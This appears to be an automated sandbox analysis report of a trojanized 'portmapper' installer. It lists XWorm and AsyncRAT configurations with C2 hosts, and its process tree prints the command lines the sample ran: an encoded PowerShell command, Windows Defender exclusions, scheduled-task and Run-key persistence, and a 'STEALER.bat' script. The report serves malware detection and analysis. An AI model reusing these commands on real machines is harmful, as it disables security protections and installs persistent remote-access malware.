Overview

overview

10

Static

static

3

portmapper-2.2.3.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    7s
  • max time network
    14s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    13-09-2024 19:23

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    portmapper-2.2.3.exe

  • Size

    5.2MB

  • MD5

    9f14a0573f96ce3c3374044e585f7eb0

  • SHA1

    88247dac3c2a4e5a760c215436a99afe9ad5577f

  • SHA256

    e5f62be708a0caa8b4e5dfcf07127eabc49a8a61a300f434367718b7e7c2e7e3

  • SHA512

    f1e5af30c5c251a294998eb15cef22d22c6e30c900e08d86721ad3bfe400b86b8866c8ec66082014f3f3da2fb576a4cf35f1ff9e1f36d1dad26403fa96f9f91b

  • SSDEEP

    98304:rqw3fQlyOEaEyr9QsYhzAkSuwnu0J74Ijb4eDaJo99AXvhdkfx5:rqw3fsVPYa7J7zjxae7iZdK

Score
10/10
asyncratnanocorexwormdefaultdefense_evasiondiscoveryevasionexecutionkeyloggerratspywarestealertrojan

Malware Config

Extracted

Family

xworm

C2

127.0.0.1:3232

l838.ddns.net:3232

0x365c3e6EeF15a2938FC7267D5A3386c8e23aBc5F:123
Attributes
  • Install_directory

    %ProgramData%

  • install_file

    Windows Security Wrapper.exe

Extracted

Family

asyncrat

Version

L838 RAT v1.0.0

Botnet

Default

C2

127.0.0.1:54984

l838.ddns.net:54984
Mutex

kswxiqghhjgkjqpqzz

Attributes
  • delay

    3

  • install

    true

  • install_file

    Windows Service Wrapper.exe

  • install_folder

    %programdata%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

    ratasyncrat
  • Detect Xworm Payload 2 IoCs
  • NanoCore

    NanoCore is a remote access tool (RAT) with a variety of capabilities.

    keyloggertrojanstealerspywarenanocore
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Async RAT payload 1 IoCs
    rat
  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 4 IoCs
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
    evasiontrojan
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

    defense_evasion
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Modifies registry class 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious use of AdjustPrivilegeToken 48 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 27 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\portmapper-2.2.3.exe
    "C:\Users\Admin\AppData\Local\Temp\portmapper-2.2.3.exe"
    1⤵
    • Checks computer location settings
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:3536
    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\PortServices.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX0\PortServices.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:3640
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAegBjACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGMAcQBnACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGUAdAB1ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAYwBoACMAPgA="
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3128
      • C:\Users\Admin\WindowsSmartScreen.exe
        "C:\Users\Admin\WindowsSmartScreen.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:4992
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\WindowsSmartScreen.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          PID:5044
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'WindowsSmartScreen.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          PID:4272
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Windows Security Wrapper.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          PID:2820
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Security Wrapper.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          PID:1792
        • C:\Windows\System32\schtasks.exe
          "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windows Security Wrapper" /tr "C:\ProgramData\Windows Security Wrapper.exe"
          4⤵
          • Scheduled Task/Job: Scheduled Task
          PID:4452
      • C:\Users\Admin\WindowsDriverFoundation.exe
        "C:\Users\Admin\WindowsDriverFoundation.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:4404
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\STEALER.bat" "
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1796
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command "Disabling-WindowsRecoveryEnvironment"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1020
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\WindowsExecutables'"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3604
        • C:\Windows\SysWOW64\reg.exe
          reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Run"
          4⤵
            PID:1108
          • C:\Windows\SysWOW64\find.exe
            find /i "SystemUpdateWindowsSmartScreen"
            4⤵
              PID:1608
            • C:\Windows\SysWOW64\reg.exe
              reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SystemUpdateWindowsSmartScreen" /t REG_SZ /d "C:\Users\Admin\WindowsSmartScreen.exe" /f
              4⤵
                PID:3476
              • C:\Windows\SysWOW64\reg.exe
                reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Run"
                4⤵
                  PID:1812
                • C:\Windows\SysWOW64\find.exe
                  find /i "SystemUpdateWindowsDriverFoundation"
                  4⤵
                    PID:4672
                  • C:\Windows\SysWOW64\reg.exe
                    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SystemUpdateWindowsDriverFoundation" /t REG_SZ /d "C:\Users\Admin\WindowsDriverFoundation.exe" /f
                    4⤵
                      PID:3400
                  • C:\Users\Admin\AppData\Roaming\trellrt.exe
                    "C:\Users\Admin\AppData\Roaming\trellrt.exe"
                    3⤵
                    • Executes dropped EXE
                    • Checks whether UAC is enabled
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of WriteProcessMemory
                    PID:3592
                    • C:\Windows\SysWOW64\schtasks.exe
                      "schtasks.exe" /create /f /tn "DDP Service" /xml "C:\Users\Admin\AppData\Local\Temp\tmp9460.tmp"
                      4⤵
                      • System Location Discovery: System Language Discovery
                      • Scheduled Task/Job: Scheduled Task
                      PID:384
                • C:\Program Files\Java\jre-1.8\bin\javaw.exe
                  "C:\Program Files\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\Admin\AppData\Local\Temp\RarSFX0\portmapper-2.2.3.jar"
                  2⤵
                    PID:3408

                Network

                MITRE ATT&CK Enterprise v15

                Replay Monitor

                Loading Replay Monitor...

                Downloads

                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                  Filesize

                  2KB

                  MD5

                  d85ba6ff808d9e5444a4b369f5bc2730

                  SHA1

                  31aa9d96590fff6981b315e0b391b575e4c0804a

                  SHA256

                  84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                  SHA512

                  8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                  Download Submit

                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
                  Filesize

                  2KB

                  MD5

                  968cb9309758126772781b83adb8a28f

                  SHA1

                  8da30e71accf186b2ba11da1797cf67f8f78b47c

                  SHA256

                  92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

                  SHA512

                  4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

                  Download Submit

                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                  Filesize

                  18KB

                  MD5

                  0e9b63ff12dff8594b547aac2aa30288

                  SHA1

                  53e7292a0cbbdba76eb10d0b8706123addf3f203

                  SHA256

                  12594dacb3a08e9be69626e651bbead4f45a2f13947ad076ec32a60f28b38402

                  SHA512

                  5f1e7d2d9a4c778d8333f3e1f5724bad32f91cd79b176bda92d840999fe5e3fbdfdccc7ef5daed53b1fad3ad66a2019338c8b876f12d61cdade6a35ce520d4e0

                  Download Submit

                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                  Filesize

                  944B

                  MD5

                  9b80cd7a712469a4c45fec564313d9eb

                  SHA1

                  6125c01bc10d204ca36ad1110afe714678655f2d

                  SHA256

                  5a9e4969c6cdb5d522c81ce55799effb7255c1b0a9966a936d1dc3ff8fe2112d

                  SHA512

                  ac280d2623c470c9dec94726a7af0612938723f3c7d60d727eb3c21f17be2f2049f97bc8303558be8b01f94406781ece0ada9a3bc51e930aff20bebb6ca17584

                  Download Submit

                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                  Filesize

                  944B

                  MD5

                  34f595487e6bfd1d11c7de88ee50356a

                  SHA1

                  4caad088c15766cc0fa1f42009260e9a02f953bb

                  SHA256

                  0f9a4b52e01cb051052228a55d0515911b7ef5a8db3cf925528c746df511424d

                  SHA512

                  10976c5deaf9fac449e703e852c3b08d099f430de2d7c7b8e2525c35d63e28b890e5aab63feff9b20bca0aaf9f35a3ba411aee3fbeee9ea59f90ed25bd617a0b

                  Download Submit

                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                  Filesize

                  944B

                  MD5

                  ba169f4dcbbf147fe78ef0061a95e83b

                  SHA1

                  92a571a6eef49fff666e0f62a3545bcd1cdcda67

                  SHA256

                  5ef1421e19fde4bc03cd825dd7d6c0e7863f85fd8f0aa4a4d4f8d555dc7606d1

                  SHA512

                  8d2e5e552210dcda684682538bc964fdd8a8ff5b24cc2cc8af813729f0202191f98eb42d38d2355df17ae620fe401aad6ceaedaed3b112fdacd32485a3a0c07c

                  Download Submit

                • C:\Users\Admin\AppData\Local\Temp\RarSFX0\PortServices.exe
                  Filesize

                  353KB

                  MD5

                  565ab186944e5842406ab4f9d74f46f5

                  SHA1

                  224bd1ca4711683c583945b3d6ecab5e5c639470

                  SHA256

                  679d4c6a8111b4948639cc03794708f234501e052b2ebe0451a3d8bcbc379328

                  SHA512

                  14b493887904eedcc55e2acf48196f4299a3e88a458ba75477a96796d644f5b11245f038cc0479d44bf58ea071c6a383a90c494654f775de4810ab2bb8129de8

                  Download Submit

                • C:\Users\Admin\AppData\Local\Temp\RarSFX0\portmapper-2.2.3.jar
                  Filesize

                  5.0MB

                  MD5

                  df6057d0eeba1ab4266dd271536f1298

                  SHA1

                  8be95aa1a26c4c4328ca6c5a98ba34766f748102

                  SHA256

                  aa5f3fb51ff107a38aaf07537e79754d94855fbe62f95a8cb702d7eeed928b6e

                  SHA512

                  f291051434229931681a55afb313f0f595de52c0d176155343c3e05fa73a5378451a203be061265cf696a5f334190a1a8060b513ee6bc9e838efda5b26c06795

                  Download Submit

                • C:\Users\Admin\AppData\Local\Temp\STEALER.bat
                  Filesize

                  1KB

                  MD5

                  1f69a22a7a1b2d2fd521ce21eb188c8f

                  SHA1

                  e966e6e359bb9e7b77ed74e77375145e5cd21fdd

                  SHA256

                  54585cad234b01400a62516b60260366f8bf29fde4aaebd81cb6b1d4bfe0cce7

                  SHA512

                  905699190d5ee151ce34900920720e955a328a4d5012542529c8e22ccebcf96d0ab18f4b3977e3f1b65a41c52a7f2ede61ceff4eb07a9a66f8bf41ac7002d755

                  Download Submit

                • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nboed0it.bdu.ps1
                  Filesize

                  60B

                  MD5

                  d17fe0a3f47be24a6453e9ef58c94641

                  SHA1

                  6ab83620379fc69f80c0242105ddffd7d98d5d9d

                  SHA256

                  96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                  SHA512

                  5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                  Download Submit

                • C:\Users\Admin\AppData\Local\Temp\tmp9460.tmp
                  Filesize

                  1KB

                  MD5

                  c959800473a9762a191d5458383878a6

                  SHA1

                  b4e211472e313711cd59ada511b0d9ad38ed7ff3

                  SHA256

                  de79f0647decf1c96baa7c71f984a23f651745a047cc5d979f42824efc3ce701

                  SHA512

                  239dd7b34a46fd5abb06d81a979b0586e9a129293248df0afdc403e3be22671df0a1d422e5e9270d8fbe5faae415b4fff9fa747aa32ef695177c4ced38688128

                  Download Submit

                • C:\Users\Admin\AppData\Roaming\trellrt.exe
                  Filesize

                  203KB

                  MD5

                  40b631e57ce22a4b52cb382cc44204c9

                  SHA1

                  58f46159e4cd20044d60c2572b91f6d48e9afafd

                  SHA256

                  338c3e0d6dc067eb96eba389e63f60621bcd5b3573bf0e6fd73dced54fe55d7a

                  SHA512

                  060d1c6e2a706bf3f375eb50647ba4820ac0c9f2d34838bda5f0303f1ef14e75e83d9167e9f50a19d72bfe4bb55fc28b7e64aa650e379f5dd2077b9e3ebbbdba

                  Download Submit

                • C:\Users\Admin\WindowsDriverFoundation.exe
                  Filesize

                  74KB

                  MD5

                  e40cf402a05b77c43a1934802059a39d

                  SHA1

                  126f95a2d81c7007214be6933862485292fab294

                  SHA256

                  edcae846e567107bdc6a741cdda70b82cd2526829899bc16ba4651f68e76a16c

                  SHA512

                  ded21984cf2d95b9cab4b677f2c58cadd914f3b5b63ecae056bcfd55bfd43c03433dbef73156aaa99c4a1fd47a8e32e0371f49ae5113beca31a47dd8221f1259

                  Download Submit

                • C:\Users\Admin\WindowsSmartScreen.exe
                  Filesize

                  69KB

                  MD5

                  603b4a00b2f8cb021066710cc002e323

                  SHA1

                  8d8b2f0e16de8c3e40485f608405bce07a31b49b

                  SHA256

                  5e380cae6f287ef4a209916f2e0f86e1511bec721fe85ddbab2bcb30255ad9a2

                  SHA512

                  0beefc1647b5e4cdd058c0a0d1e7c739297733f4d4dbf4cf5f2588b2c1c23049376c392150a375df855a27e4c99cf05f2c924427bc457bbe7ca53e58d8958956

                  Download Submit

                • memory/1020-140-0x000000006F440000-0x000000006F48C000-memory.dmp

                  Filesize

                  304KB

                  Download

                • memory/1020-158-0x0000000007C30000-0x0000000007C38000-memory.dmp

                  Filesize

                  32KB

                  Download

                • memory/1020-157-0x0000000007D00000-0x0000000007D1A000-memory.dmp

                  Filesize

                  104KB

                  Download

                • memory/1020-154-0x0000000007BB0000-0x0000000007BC1000-memory.dmp

                  Filesize

                  68KB

                  Download

                • memory/1020-153-0x0000000007C40000-0x0000000007CD6000-memory.dmp

                  Filesize

                  600KB

                  Download

                • memory/1020-150-0x00000000079B0000-0x00000000079CA000-memory.dmp

                  Filesize

                  104KB

                  Download

                • memory/3128-93-0x0000000004B60000-0x0000000004BC6000-memory.dmp

                  Filesize

                  408KB

                  Download

                • memory/3128-94-0x0000000004C40000-0x0000000004CA6000-memory.dmp

                  Filesize

                  408KB

                  Download

                • memory/3128-139-0x0000000006C60000-0x0000000006D03000-memory.dmp

                  Filesize

                  652KB

                  Download

                • memory/3128-128-0x000000006F440000-0x000000006F48C000-memory.dmp

                  Filesize

                  304KB

                  Download

                • memory/3128-127-0x0000000006040000-0x0000000006072000-memory.dmp

                  Filesize

                  200KB

                  Download

                • memory/3128-151-0x00000000073F0000-0x0000000007A6A000-memory.dmp

                  Filesize

                  6.5MB

                  Download

                • memory/3128-152-0x0000000006E20000-0x0000000006E2A000-memory.dmp

                  Filesize

                  40KB

                  Download

                • memory/3128-122-0x0000000005AB0000-0x0000000005AFC000-memory.dmp

                  Filesize

                  304KB

                  Download

                • memory/3128-121-0x0000000005A80000-0x0000000005A9E000-memory.dmp

                  Filesize

                  120KB

                  Download

                • memory/3128-155-0x0000000007010000-0x000000000701E000-memory.dmp

                  Filesize

                  56KB

                  Download

                • memory/3128-156-0x0000000007020000-0x0000000007034000-memory.dmp

                  Filesize

                  80KB

                  Download

                • memory/3128-84-0x0000000002490000-0x00000000024C6000-memory.dmp

                  Filesize

                  216KB

                  Download

                • memory/3128-96-0x00000000054D0000-0x0000000005824000-memory.dmp

                  Filesize

                  3.3MB

                  Download

                • memory/3128-138-0x0000000006020000-0x000000000603E000-memory.dmp

                  Filesize

                  120KB

                  Download

                • memory/3128-92-0x0000000004AC0000-0x0000000004AE2000-memory.dmp

                  Filesize

                  136KB

                  Download

                • memory/3128-86-0x0000000004DA0000-0x00000000053C8000-memory.dmp

                  Filesize

                  6.2MB

                  Download

                • memory/3408-123-0x000001FA08D80000-0x000001FA08D81000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/3604-176-0x00000000067B0000-0x00000000067FC000-memory.dmp

                  Filesize

                  304KB

                  Download

                • memory/3604-177-0x0000000071780000-0x00000000717CC000-memory.dmp

                  Filesize

                  304KB

                  Download

                • memory/3604-187-0x00000000077C0000-0x0000000007863000-memory.dmp

                  Filesize

                  652KB

                  Download

                • memory/3604-188-0x0000000007A70000-0x0000000007A81000-memory.dmp

                  Filesize

                  68KB

                  Download

                • memory/3604-199-0x0000000007AA0000-0x0000000007AB4000-memory.dmp

                  Filesize

                  80KB

                  Download

                • memory/3604-171-0x0000000005E90000-0x00000000061E4000-memory.dmp

                  Filesize

                  3.3MB

                  Download

                • memory/4404-74-0x0000000000EB0000-0x0000000000EC8000-memory.dmp

                  Filesize

                  96KB

                  Download

                • memory/4992-68-0x00000000006E0000-0x00000000006F8000-memory.dmp

                  Filesize

                  96KB

                  Download

                • memory/5044-198-0x00000200764F0000-0x0000020076512000-memory.dmp

                  Filesize

                  136KB

                  Download